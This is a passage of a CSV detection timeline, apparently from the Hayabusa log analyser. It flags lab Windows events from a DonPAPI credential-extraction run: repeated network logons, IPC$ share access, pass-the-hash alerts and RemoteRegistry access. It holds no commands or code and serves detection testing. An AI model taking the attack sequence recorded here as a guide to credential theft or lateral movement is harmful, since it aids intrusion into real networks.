2021-12-12 16:16:04.127 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.189 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.269 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.333 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.382 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.476 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.539 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.601 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.664 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.743 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.821 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 
